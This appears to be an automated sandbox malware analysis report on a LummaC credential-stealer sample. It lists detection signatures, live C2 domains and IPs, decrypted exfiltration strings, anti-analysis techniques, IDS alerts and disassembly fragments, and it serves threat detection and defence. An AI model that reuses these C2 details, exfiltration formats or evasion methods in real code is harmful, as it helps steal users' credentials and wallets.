Edit tour

Windows Analysis Report
z3IxCpcpg4.exe

Overview

General Information

Sample name:	z3IxCpcpg4.exe renamed because original name is a hash value
Original sample name:	764b683cac60e423ff3659606d250cb4.exe
Analysis ID:	1580901
MD5:	764b683cac60e423ff3659606d250cb4
SHA1:	c2117ac35e093453512c0cd0bb9a4a02eb7b50ba
SHA256:	ef2573bda777bead9483d197af10c4cb9b485dccdba83f2a51e350ea44a3cbd1
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to detect virtual machines (SIDT)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

z3IxCpcpg4.exe (PID: 4296 cmdline: "C:\Users\user\Desktop\z3IxCpcpg4.exe" MD5: 764B683CAC60E423FF3659606D250CB4)

chrome.exe (PID: 5548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 --field-trial-handle=2272,i,1615752867562704235,17877190940150072882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1160 --field-trial-handle=2012,i,15433138936356664886,13501548985382534972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wordyfindy.lat", "bashfulacid.lat", "tentabatte.lat", "manyrestro.lat", "talkynicer.lat", "slipperyloo.lat", "observerfry.lat", "shapestickyr.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: z3IxCpcpg4.exe PID: 4296	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: z3IxCpcpg4.exe PID: 4296	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: z3IxCpcpg4.exe PID: 4296	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: z3IxCpcpg4.exe PID: 4296	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:28.141742+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	23.55.153.106	443	TCP
2024-12-26T13:01:30.733467+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.66.86	443	TCP
2024-12-26T13:01:33.144268+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.66.86	443	TCP
2024-12-26T13:01:36.211480+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.66.86	443	TCP
2024-12-26T13:01:38.601811+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.66.86	443	TCP
2024-12-26T13:01:41.186001+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	104.21.66.86	443	TCP
2024-12-26T13:01:44.394122+0100	2028371	3	Unknown Traffic	192.168.2.5	49718	104.21.66.86	443	TCP
2024-12-26T13:01:47.331083+0100	2028371	3	Unknown Traffic	192.168.2.5	49725	104.21.66.86	443	TCP
2024-12-26T13:01:52.435030+0100	2028371	3	Unknown Traffic	192.168.2.5	49737	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:31.481959+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.66.86	443	TCP
2024-12-26T13:01:33.933975+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49706	104.21.66.86	443	TCP
2024-12-26T13:01:53.243715+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49737	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:31.481959+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49705	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:33.933975+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49706	104.21.66.86	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:55.035435+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49743	185.215.113.16	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:26.360816+0100	2058480	1	Domain Observed Used for C2 Detected	192.168.2.5	51436	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:26.076952+0100	2058484	1	Domain Observed Used for C2 Detected	192.168.2.5	65147	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:25.582955+0100	2058492	1	Domain Observed Used for C2 Detected	192.168.2.5	58231	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:25.732879+0100	2058500	1	Domain Observed Used for C2 Detected	192.168.2.5	50265	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:25.432079+0100	2058502	1	Domain Observed Used for C2 Detected	192.168.2.5	64990	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:25.900917+0100	2058510	1	Domain Observed Used for C2 Detected	192.168.2.5	51908	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:26.219001+0100	2058512	1	Domain Observed Used for C2 Detected	192.168.2.5	62124	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:25.292052+0100	2058514	1	Domain Observed Used for C2 Detected	192.168.2.5	61173	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:45.311919+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49718	104.21.66.86	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T13:01:29.100945+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: z3IxCpcpg4.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://lev-tolstoi.com/apim

Avira URL Cloud: Label: malware

Found malware configuration

Source: z3IxCpcpg4.exe.4296.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["wordyfindy.lat", "bashfulacid.lat", "tentabatte.lat", "manyrestro.lat", "talkynicer.lat", "slipperyloo.lat", "observerfry.lat", "shapestickyr.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: z3IxCpcpg4.exe	Virustotal: Detection: 66%			Perma Link
Source: z3IxCpcpg4.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: z3IxCpcpg4.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: observerfry.lat
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2112480512.0000000004810000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Code function: 0_2_00F158D5 CryptUnprotectData,

0_2_00F158D5

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: z3IxCpcpg4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49811 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49737 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: z3IxCpcpg4.exe, 00000000.00000002.2571237429.0000000005CE2000.00000040.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F21A10
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00F23B50
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00F40340
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2D34A
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	0_2_00F0CC7A
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov eax, ebx	0_2_00F27440
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	0_2_00F27440
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	0_2_00F40D20
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F22E6D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then jmp edx	0_2_00F22E6D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00F22E6D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edx, ebx	0_2_00F08600
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_00F41720
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edx, ecx	0_2_00F1B8F6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edx, ecx	0_2_00F1B8F6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2C0E6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov esi, ecx	0_2_00F290D0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2E0DA
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F1D8D8
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F1D8D8
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov eax, ebx	0_2_00F1C8A0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	0_2_00F1C8A0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	0_2_00F1C8A0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	0_2_00F1C8A0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F1D8AC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F1D8AC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2C09E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00F2C850
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00F22830
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	0_2_00F3C830
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then push esi	0_2_00F0C805
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00F289E9
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00F281CC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then jmp edx	0_2_00F239B9
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00F239B9
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_00F3C990
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00F2B980
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_00F2B170
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F2D17D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]	0_2_00F41160
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov eax, dword ptr [00F46130h]	0_2_00F18169
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2C09E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F2D116
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00F2AAC0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	0_2_00F08A50
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	0_2_00F3CA40
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00F36210
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00F073D0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00F073D0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00F283D8
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]	0_2_00F1EB80
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	0_2_00F0AB40
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edx, ecx	0_2_00F18B1B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F1C300
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00F14CA0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F1747D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov word ptr [edx], di	0_2_00F1747D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	0_2_00F2C465
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2C465
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_00F3CDF0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]	0_2_00F3CDF0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_00F3CDF0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	0_2_00F3CDF0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2DDFF
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]	0_2_00F3EDC1
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edi, ecx	0_2_00F2A5B6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then dec edx	0_2_00F3FD70
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]	0_2_00F1B57D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00F28528
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edx, ecx	0_2_00F26D2E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_00F406F0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edx, ecx	0_2_00F29E80
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then dec edx	0_2_00F3FE00
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00F2DE07
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then jmp edx	0_2_00F237D6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov dword ptr [esp+20h], eax	0_2_00F09780
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F16F52
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00F27740
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then jmp eax	0_2_00F29739
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov ecx, eax	0_2_00F2BF13
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 4x nop then mov edi, dword ptr [esp+28h]	0_2_00F25F1B

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 34MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:58231 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:65147 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:51436 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:61173 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:64990 -> 1.1.1.1:53
